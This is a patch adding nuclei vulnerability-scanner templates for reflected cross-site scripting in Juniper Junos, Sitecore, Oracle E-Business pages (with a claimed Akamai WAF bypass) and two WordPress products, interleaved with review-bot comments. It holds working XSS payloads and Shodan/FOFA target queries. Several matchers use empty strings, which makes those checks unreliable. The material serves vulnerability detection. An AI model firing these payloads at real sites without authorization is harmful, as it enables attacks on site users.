+# digest: 4b0a00483046022100c1764a9162e0a6176f9467763300c3098e083df7c6d3d009c45082d04cdb80c8022100ad8e61a167d489f140299c3f1325493fcb534851d8d6145a521178d8927ae12c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/junos-xss.yaml b/poc/xss/junos-xss.yaml
new file mode 100644
index 0000000000..65691a796e
--- /dev/null
+++ b/poc/xss/junos-xss.yaml
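Review bot: The matcher line `contains(body, "")` is a no-op, since `contains` with an empty needle is always true, so as rendered here the only body evidence is `contains(body, "beyondtrust")`, which fingerprints the product rather than proving the injected markup was reflected; the same empty-string match appears in junos-xss (`- ""`), photoblocks-grid-gallery-xss, sitecore-xml-xss and wp-real-estate-xss. If the committed files hold the reflected markup and this page merely stripped the tag, nothing needs to change, but if the files are as shown, every reachable instance of these products will be reported as vulnerable. Separately, the description has a typo: `acheive` should be `achieve`.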
@@ -0,0 +1,51 @@
+id: junos-xss
+
+info:
+ name: JunOS - Cross-Site Scripting
+ author: DhiyaneshDK
+ severity: medium
+ reference:
+ - https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/
+ metadata:
+ verified: true
+ max-request: 2
+ shodan-query: title:"Juniper Web Device Manager"
+ fofa-query: title="Juniper Web Device Manager"
+ tags: junos,xss
+
+variables:
+ string: "{{to_lower(rand_base(2))}}"
+
+http:
+ - raw:
+ - |
+ POST /webauth_operation.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ rs=emit_debug_note&rsargs[]={{string}}&rsargs[]=
+
+ - |
+ POST /webauth_operation.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ rs=sajax_show_one_stub&rsargs[]={{string}}
+
+ stop-at-first-match: true
+ matchers-condition: or
+ matchers:
+ - type: word
+ name: emit-debug-note-xss
+ words:
+ - "ERROR: "
+ - "monospace"
+ condition: and
+
+ - type: word
+ name: sajax-show-one-stub-xss
+ words:
+ - ""
+ - "wrapper for"
+ condition: and
+# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/xss/photoblocks-grid-gallery-xss.yaml b/poc/xss/photoblocks-grid-gallery-xss.yaml
new file mode 100644
index 0000000000..d8eee65d19
--- /dev/null
+++ b/poc/xss/photoblocks-grid-gallery-xss.yaml
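Review bot: `info` has no `description`, unlike every other template in this patch, so the reference URL is the only explanation of what the two `webauth_operation.php` requests are testing. Add a `description: |` block stating that the `emit_debug_note` and `sajax_show_one_stub` handlers reflect the `rsargs[]` parameter into the page unescaped (confirm the wording against the referenced write-up), and ideally a `remediation` line naming the fixed Junos release if the reference gives one. The file also ends without a trailing newline after the `# digest:` line (`\ No newline at end of file`), as does xss-oracle.yaml later in this patch.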
@@ -0,0 +1,35 @@
+id: photoblocks-grid-gallery-xss
+
+info:
+ name: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website.
+ remediation: Fixed in version 1.1.41
+ reference:
+ - https://plugins.trac.wordpress.org/changeset/2117972
+ - https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d
+ - https://wordpress.org/plugins/photoblocks-grid-gallery/
+ metadata:
+ verified: true
+ max-request: 1
+ publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
+ tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss
+
+http:
+ - raw:
+ - |
+ GET /wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "")'
+ - 'contains(body, "PhotoBlocks")'
+ condition: and
+
+# digest: 4a0a00473045022100e25d0c3f2b8523d249ea8a1fcf6aa3cb5352dde3741a6d1d98af45fbc385795002206e778ddccd1913d8f33ffe208083c9d0913d0952757b3d3e7f3a52afd8e89deb:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/sitecore-xml-xss.yaml b/poc/xss/sitecore-xml-xss.yaml
new file mode 100644
index 0000000000..cc2218efd6
--- /dev/null
+++ b/poc/xss/sitecore-xml-xss.yaml
@@ -0,0 +1,39 @@
+id: sitecore-xml-xss
+
+info:
+ name: SiteCore XML Control Script Insertion
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ Sitecores “special way” of displaying XML Controls directly allows for a Cross Site Scripting Attack – more can be achieved with these XML Controls
+ reference: |
+ - https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273
+ - https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded
+ metadata:
+ verified: "true"
+ max-request: 1
+ shodan-query: html:"Sitecore"
+ tags: xss,sitecore,cms
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a00473045022050a33d1e8d168b7a9ba886b1f58923cc292c3a53bc0d5c3eab7fa010ac80a5a4022100c2f3d55ef7064d8b24c06eecf38ee7308b5f5d8c5b18284c03fca9553631f311:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/wp-real-estate-xss.yaml b/poc/xss/wp-real-estate-xss.yaml
new file mode 100644
index 0000000000..812d486da6
--- /dev/null
+++ b/poc/xss/wp-real-estate-xss.yaml
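Review bot: `reference: |` turns the two references into a single block-scalar string containing literal `- https://…` lines instead of a YAML list; every other template in this patch uses a plain list under `reference:`, so the `|` should be dropped. Likewise `verified: "true"` is a quoted string where the other templates use the boolean `verified: true`. Neither changes what the template sends, but any tooling that reads these fields by type (a list of URLs, a boolean) will treat this file differently from its siblings.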
@@ -0,0 +1,37 @@
+id: wp-real-estate-xss
+
+info:
+ name: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting
+ author: Harsh
+ severity: medium
+ description: |
+ The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://www.exploitalert.com/view-details.html?id=39344
+ - https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
+ - https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ max-request: 1
+ publicwww-query: "/wp-content/themes/realestate-7/"
+ tags: packetstorm,wordpress,wp-theme,wp,xss,realestate
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "")'
+ - 'contains(body, "/wp-content/themes/realestate-7/")'
+ condition: and
+
+# digest: 4a0a0047304502206c539003b913a5aa84666f731c82c96bb3aec3f8fe23d82ea49a4f605525ecba022100de91aaf7c5e02ad1c794895f6017562d5a314e1fd3bf1e877253019f285191b3:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/xss-oracle.yaml b/poc/xss/xss-oracle.yaml
new file mode 100644
index 0000000000..10c054b913
--- /dev/null
+++ b/poc/xss/xss-oracle.yaml
@@ -0,0 +1,22 @@
+id: xss-oracle
+
+info:
+ name: XSS Vulnerability with bypass Akamai WAF 8/11/2024
+ author: 111xnagashy
+ severity: Medium
+ description: This template checks for an XSS vulnerability in the hidden input field where the 'oncontentvisibilityautostatechange' attribute is used full payload "\">".
+ tags: xss, WAF bypass, oa_html
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/OA_HTML/ibeCAcdLogin.jsp?username=ttttttttttt\">ttttttttttttttttt"
+ - "{{BaseURL}}/OA_HTML/ibeCAcdLogin.jsp?ref=ttttttttttt\">ttttttttttttttttt"
+ - "{{BaseURL}}/OA_HTML/ibeCAcpCustomLogin.jsp?ref=ttttttttttt\">ttttttttttttttttt"
+ - "{{BaseURL}}/OA_HTML/custibeCAcdPwdAssist.jsp?email=ttttttttttt\">ttttttttttttttttt"
+ redirects: false
+ matchers:
+ - type: word
+ words:
+ - "ttttttttttt\">ttttttttttttttttt"
+ part: body
\ No newline at end of file
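Review bot: This template uses the legacy `requests:` protocol key while every other template in this patch uses `http:`; current nuclei documentation names the section `http:` (I believe `requests` is still accepted with a deprecation warning, but confirm before relying on it). `severity: Medium` and `tags: xss, WAF bypass, oa_html` also break the conventions used elsewhere here: severities are lowercase and tags are comma-separated with no spaces, so `tags: xss,waf-bypass,oa_html` would let tag-based filtering select this template. The `info` block has no `reference` or `metadata`, and with four paths requested it should carry `max-request: 4`. Finally, the single `word` matcher only checks that the probe string is echoed in the body with no status or content-type condition, so any error page that echoes the query string would also match; add `matchers-condition: and` with a `status` matcher and a `contains(content_type, "text/html")` check as the other templates do.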